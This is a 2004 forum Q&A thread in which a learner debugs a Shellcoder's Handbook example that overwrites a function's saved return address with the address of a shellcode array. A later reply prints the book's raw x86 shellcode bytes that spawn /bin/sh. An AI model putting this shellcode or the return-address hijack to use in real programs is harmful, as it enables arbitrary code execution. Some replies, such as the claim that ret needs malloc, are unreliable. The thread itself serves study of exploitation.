Solved

q about char code[] cast as (int)code conversion

Posted on 2004-09-15
Last Modified: 2010-04-15
Hi C area guys and gals,
The following is code from The Shellcoder's Handbook, page 23. It segfaults, and when debugging I run across an incomprehensible value for (int)shellcode.

char shellcode[] = "0001";
int main() {
  int *ret;
  ret = (int *)&ret + 2;    /* int-pointer arithmetic: +2 moves 2*sizeof(int) bytes up the stack frame */
  (*ret) = (int)shellcode;  /* the array decays to a pointer, so this stores the address of shellcode, not its contents */
}

As shown in the debugging cut/paste here:

(gdb) p shellcode
$1 = "0001"
(gdb) p &shellcode
$2 = (char (*)[5]) 0x8049534
(gdb) p (char *)shellcode
$3 = 0x8049534 "0001"
(gdb) p (int)shellcode
$4 = 134518068

$4 is different from the hex value 0x8049534, and sizeof char on RHFC2 is 4, so I thought it would print "1" because char shellcode[] = "0001". Why doesn't it?
0
Question by:joesp
15 Comments
 
LVL 5

Expert Comment

by:tzxie2000
ID: 12065777
134518068 is exactly 0x8049534.
(int)shellcode will print the address of shellcode;
it does not mean parsing the string shellcode into an int value,
so it would not be 1.

If you tell us what this code is meant to show in the example, it may help us to explain it.
0
 
LVL 1

Author Comment

by:joesp
ID: 12066110
Uh, yes, I was wrong about the conversion -- I finally found a hextodec in converter.java and it is an int conversion of the address 0x8.....
What does it do?
They are adding 2 to the address of the first variable on the stack to overwrite its RET value (I think the stack is

RET
EBP
shellcode

so &shellcode+2 == &RET
(gdb) p &ret
$1 = (int **) 0xfeefdb64
(gdb) info registers
eax            0x0      0
ecx            0xfeefdbfc       -17835012
edx            0xfeefdbf4       -17835020
ebx            0x552ffc 5582844
esp            0xfeefdb60       0xfeefdb60
ebp            0xfeefdb68       0xfeefdb68
esi            0x1      1
edi            0x5550fc 5591292
eip            0x804834c        0x804834c

so &ret is between ebp and esp

in gdb, &ret+1 == ebp
If I use &ret+1 instead of &ret+2 it doesn't segfault. Does anybody know the purpose, though, of casting to "int"?
0
 
LVL 4

Expert Comment

by:smpoojary
ID: 12066149
char shellcode[] = "0001";
int main() {
  int *ret;
// Here memory allocation statement for ret is missed.
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}

In the above code you didn't initialize memory for ret. For initializing memory, use malloc() or calloc(). That's why the segmentation fault is coming. This means you can't use &ret + 2. First you have to initialize ret [ret = (int*)malloc(5*sizeof(int));], then you can write ret = ret + 2; (*ret)=(int)shellcode;

-Mahesh
0
 
LVL 5

Expert Comment

by:tzxie2000
ID: 12066177
I think you should make clear how many bytes ebp .... is on your computer and system.
0
 
LVL 16

Expert Comment

by:PaulCaswell
ID: 12066316
It's a stack hack!

>>ret = (int *)&ret + 2;

is taking the address of the only variable on the stack and adding 2 to it. It is therefore assuming that the return opcode is next on the stack, that it is 2 bytes in length, and that there is an important address following it. It's then trying to hack that address to contain some stupid value: the address of a string in data space.

It WILL go bang on almost every system other than the one it was crafted for.

Paul
0
 
LVL 1

Author Comment

by:joesp
ID: 12066367
But my post @ 8:43 shows
------------------
(gdb) p &ret
$1 = (int **) 0xfeefdb64
------------------
It has an address on the stack. Maybe what you mean is that it's not initialized, so the place it points to hasn't been initialized yet, or no space has been allocated on the heap .. but this is all just stack address manipulation.

ebp in x86 points to the beginning of the stack, like esp points to the current location of the stack pointer.
0
 
LVL 5

Expert Comment

by:tzxie2000
ID: 12066411
ret really does not point to an allocated part of memory.
The program surely wants to reach some part of the stack that normally cannot be accessed through the variables in the function.
I think it may be the return value of main,
but it is straightforward:
(*ret) = (int)shellcode;
So maybe you should read carefully what this example in the book wants to tell you.
If you still don't know the meaning, please post the book's reference part for the example and let's discuss it.
0
 
LVL 1

Author Comment

by:joesp
ID: 12066417
I may have to figure out on my own why it's not working. The book example he gives segfaults, unless I only add 1 to &ret ... which doesn't run the shellcode, so I will have to research this one. This problem runs deeper than I thought ... originally, I just wanted to know why it casts to an int. I'm still open for that answer, BTW.
0
 
LVL 1

Author Comment

by:joesp
ID: 12066472
Source:

http://www.sirfsup.com/languages/assembler/koziol/Chapter_02/Shellcoders02sampleprogram05.c

It should do this:

$gcc shellcode.c -o shellcode
$./shellcode
#

As he explains, the shellcode is the objdump of exe code to create a shell.
0
 
LVL 5

Accepted Solution

by:
tzxie2000 earned 150 total points
ID: 12066490
Oh, I see.

I think it may want to assign the return position in the stack,

like this slightly different code:

char shellcode[] = "0001";
int f(void);   /* declared before use so the example compiles under C99 and later */
int main() {
  int i;
  f();
  i=1;
}
int f() {
  int *ret;
// Here memory allocation statement for ret is missed.
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}

Normally the return address will be the code site at i=1; but after

  int *ret;
// Here memory allocation statement for ret is missed.
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;

the book wants to assign the return address to a data segment, and when the function f returns to main it will access a data segment and lead to a seg fault.
0
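The two points raised above (tzxie2000's first reply, that (int)shellcode is the array's address and not its contents, and the question of what "&ret + 2" actually skips over) as an added C example that is not code from the thread or the book. The array contents are constructed, and uintptr_t replaces the book's int cast so the comparison also holds on 64-bit builds.

```c
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>

/* Constructed stand-in for the array in the thread (example code, not the book's). */
char shellcode[] = "0001";

/* (int)shellcode in the book's code converts the array's address, not its
 * contents: the array decays to a pointer to its first byte. uintptr_t is used
 * here instead of int so the comparison also holds on 64-bit builds. */
int cast_is_address(void) {
    uintptr_t as_integer = (uintptr_t)shellcode;
    uintptr_t first_byte = (uintptr_t)&shellcode[0];
    return as_integer == first_byte && as_integer != 1;
}

/* Distance in bytes covered by "p + n" when p is an int pointer. Pointer
 * arithmetic scales by sizeof(*p), so the book's "+ 2" moves 2*sizeof(int)
 * bytes up the frame, not 2 bytes; which slot that lands on depends on how the
 * compiler laid out the frame, which is why the offset is not portable. */
ptrdiff_t int_ptr_step_bytes(int n) {
    int slots[8] = {0};
    int *p = slots;                 /* stay inside the array: n in [0, 8] */
    return (char *)(p + n) - (char *)p;
}

/* The book targets 32-bit x86, where int and pointers are both 4 bytes so
 * (int)shellcode loses nothing. Returns 1 on such a target, 0 where (int)
 * would truncate the address (e.g. most 64-bit builds). */
int int_cast_preserves_address(void) {
    return sizeof(int) == sizeof(void *);
}

int main(void) {
    printf("(uintptr_t)shellcode = %#lx (decimal %lu), same as &shellcode[0]: %s\n",
           (unsigned long)(uintptr_t)shellcode, (unsigned long)(uintptr_t)shellcode,
           cast_is_address() ? "yes" : "no");
    printf("int* + 2 advances %td bytes (sizeof(int) = %zu)\n",
           int_ptr_step_bytes(2), sizeof(int));
    printf("(int) cast keeps the whole address on this build: %s\n",
           int_cast_preserves_address() ? "yes" : "no");
    return 0;
}
```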
 
LVL 1

Author Comment

by:joesp
ID: 12066726
Does this book example work for anybody else? You can download that source from that same page by clicking "any_browser_source.txt", or if you are using MSIE you need to click "msie.txt".
0
 
LVL 1

Author Comment

by:joesp
ID: 12066889
tzxie2000

You are on the right track ... it is overwriting the return address of RET by replacing that value (which points to an address) not with the address of (wherever the hell "main" returns to after it exits) but with the address of shellcode, which (magically) (magic helped by the fact that it's an object dump?) executes (itself?) after main returns ... I am not convinced it is segfaulting because it is trying to access code from the data section .... once the program exits .... the code in the data section is returned to the system, and would just be any old addressable address, no?
0
 
LVL 5

Expert Comment

by:tzxie2000
ID: 12066932
Yes, I tested the code.

I think maybe the shellcode assigned by the book
char shellcode[] =    
 "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
 "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
 "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

is more special and contains some code for the system.

I tested the code and my system crashed.
0
 
LVL 1

Author Comment

by:joesp
ID: 12067108
tzxie2000, thank you for your time. I am sorry we couldn't resolve this. It is only the second chapter; I will post here when I find the answer later in the book .... I don't have the time at the moment.
0
 
LVL 5

Expert Comment

by:tzxie2000
ID: 12067174
You're welcome.
0
